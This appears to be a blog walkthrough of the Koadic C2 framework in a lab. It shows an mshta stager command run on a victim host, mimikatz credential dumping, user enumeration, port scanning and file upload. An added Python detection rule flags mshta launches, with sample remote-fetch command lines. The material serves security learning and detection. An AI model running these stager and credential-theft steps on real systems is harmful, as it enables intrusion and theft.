Today I'd like to write about another post-exploitation kit, the Koadic C2. While it seems like there are dozens of C2 options out there (including Cobalt Strike), I wanted to investigate Koadic anyway. To get started, we can quickly and easily install it via:
git clone https://github.com/zerosum0x0/koadic.git
cd koadic
pip3 install -r requirements.txt
Once we are up and running, we will see this menu:
Typing ? will show us the commands we can run:
As you can already see, there are similarities to tools like Empire. It is worth noting that the "victims" are referred to as zombies within this tool. There is also ...taco time?
Ha, I guess it is exactly what it claims to be. Getting serious now, let's get us a zombie!
Step one is to set up a stager. The tool starts you within the mshta stager; according to the project's video, it is the smallest and most reliable option. So let's type in info and see what options we need to set.
Easily enough, we just need to set our callback host and port. For the demo, let's leave those as default. Once those are set, simply run run to launch the stager. We'll be given a URL which the stager is using to receive zombies. Note that the URL must be used exactly as given; do not edit it.
Now that the stager is running, we switch to our compromised host and use the URL in an mshta command. For the purposes of this demo, we'll have RDP access to the machine. Run mshta <URL> on the victim machine and you'll see a zombie check in on the attacker machine.
And we are successful!
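The stager above works because mshta.exe will happily fetch and execute an HTA from a URL given on its command line, which is also what makes it visible to a defender. The following is an added example, not code from the original post or from the Koadic project: it runs a simple process-creation check over constructed Sysmon-style (Event ID 1) records and flags mshta invocations whose argument is a remote location (http/https/ftp URL or UNC path) or an inline javascript:/vbscript: handler, while leaving a local .hta launch alone. The event records, hosts and ports are all made up for the example.

```python
import re

# Constructed Sysmon-style process-creation records (not real captures).
# Only the fields the check needs are included.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://10.0.0.5:8080/stager",          # remote HTA (stager-like)
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"',  # local file, benign here
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'mshta javascript:a=GetObject("script:https://example.invalid/x");close();',
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta \\fileserver\share\payload.hta",       # UNC path, still remote
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe http://not-a-hit.txt",            # not mshta, ignored
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# A URL with a network scheme, or a UNC path (\\host\share...).
REMOTE_RE = re.compile(r'(?i)\b(https?|ftp)://\S+|\\\\[^\\\s]+\\')
# Inline script handlers that let mshta run code without any file at all.
PROTO_HANDLER_RE = re.compile(r'(?i)^(javascript|vbscript|about):')


def classify_mshta(event):
    """Return a reason string if this process-creation event looks like an
    mshta-based stager, or None if it is not mshta / looks like a local HTA."""
    image = event.get("Image", "")
    if not image.lower().endswith("\\mshta.exe"):
        return None
    cmd = event.get("CommandLine", "")
    # Drop the program token so the executable's own path is never matched.
    # Assumes mshta is launched from its usual System32 path (no spaces).
    _, _, args = cmd.partition(" ")
    args = args.strip().strip('"')
    if PROTO_HANDLER_RE.match(args):
        return "mshta with inline script protocol handler"
    if REMOTE_RE.search(args):
        return "mshta fetching HTA from remote location"
    return None


def scan_events(events):
    """Run classify_mshta over a batch and return (command line, parent, reason)
    for every hit, in input order."""
    findings = []
    for ev in events:
        reason = classify_mshta(ev)
        if reason:
            findings.append((ev.get("CommandLine", ""), ev.get("ParentImage", ""), reason))
    return findings


if __name__ == "__main__":
    for cmdline, parent, reason in scan_events(SAMPLE_EVENTS):
        print(f"{reason}: {cmdline!r} (parent: {parent})")
```

The parent process is carried along because it is usually the better pivot: mshta spawned by cmd.exe or powershell.exe with a URL argument is far more suspicious than the same binary opened by explorer.exe on a local file. Tuning that rule (and allow-listing any legitimate HTA-based installers) is the part a real deployment needs.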
From here, we can run zombies to see our list of zombies:
We can also get more detailed information by supplying an ID to the
Now we should interact with our zombie. We can start with use implant and press tab twice to see our options:
The implants are well organized, so we'll just pick inject to start with.
We can then use
It is kind of neat that there is an option to target ALL zombies, though that would make some noise.
Anyway, all the options look fine, so let's run. The output is pretty standard for the mimikatz command:
We should take a look at some of the other implants we can use.
That screenshot is trash, so let's instead dig into some of the options that stand out.
Under implant/gather/ we have some valuable information to collect through our zombie, including clipboard data, domain info, shares, users, etc. As an example, to collect the users we can run use implant/gather/enum_users and then run. Interestingly, the results never showed up on my attacker machine. Instead, the job ran for some time and I noticed that the below window had appeared on my victim machine:
So I still got the information I was looking for, just in a strange way. I'm not sure if this is intended or not. We can also run use implant/scan/tcp to run a port scan from our zombie. I just left the defaults and targeted another machine in the lab:
Under implant/util/ we can upload or download a file. I'll create a test file and upload it to the zombie. Similar to the other modules, we just use the module and run options to see what info we need to provide. In this case, it is really just the LFILE and DIRECTORY options. I selected the Administrator's Desktop. Note that using \ as the path separator caused an error while / was successful.
Over on the zombie, we can see the file on the Desktop:
That's about it for today. I've shown just how easy Koadic is to use as a C2 tool. I know there are more advanced features, such as injecting straight into memory, but I'll save those for another post (maybe). Hopefully this post helps you in some way and, as always, thanks for reading!